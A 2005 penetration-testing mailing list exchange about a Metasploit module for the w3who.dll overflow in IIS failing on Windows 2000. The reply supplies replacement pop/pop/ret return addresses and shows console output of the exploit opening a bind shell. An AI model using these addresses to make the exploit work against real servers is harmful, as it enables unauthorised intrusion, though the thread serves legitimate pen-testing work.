![pen-test logo](/images/pen-test-logo.png)
Penetration Testing mailing list archives
Re: question regarding w3who.dll bug
From: H D Moore <sflist () digitaloffense net>
Date: Sat, 15 Jan 2005 01:56:01 -0600
The return address for Windows 2000 fails because the ImageBase for the DLL is different. I forget to check the base address on 2000 after fixing the code to work on Windows XP SP2 :-( A new module will be posted to metasploit.com shortly. In the meantime, just change the return address in the Targets section to one of the following: 0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000) 0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English]) 0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English]) If you run into any other bugs or reliability problems with the Metasploit Framework, *please* drop us an email at msfdev[at]metasploit.com :-) -HD --- msf iis_w3who_overflow(win32_bind) > exploit [*] Starting Bind Handler. [*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000) [*] Sending 8254 bytes to remote host. [*] Waiting for a response... [*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> On Friday 14 January 2005 02:49, Martin Bernhard wrote:
Hi, As one of our clients is running some IIS web servers with w3who.dll on them, I figured that this would be a good place to start our pen test. Unfortunately, the exploit in the new release of the Metasploit Framework did not work on the most important servers (Windows 2000). I have access to a test system that gives me the opportunity to analyze the bug in detail, but I cant figure out what parts in memory are overwritten. Does anybody know what exactly I have to do to trigger the bug and analyze it (Im using ollydbg)? Any help is much appreciated
Current thread:
- question regarding w3who.dll bug Martin Bernhard (Jan 14)
- Re: question regarding w3who.dll bug H D Moore (Jan 15)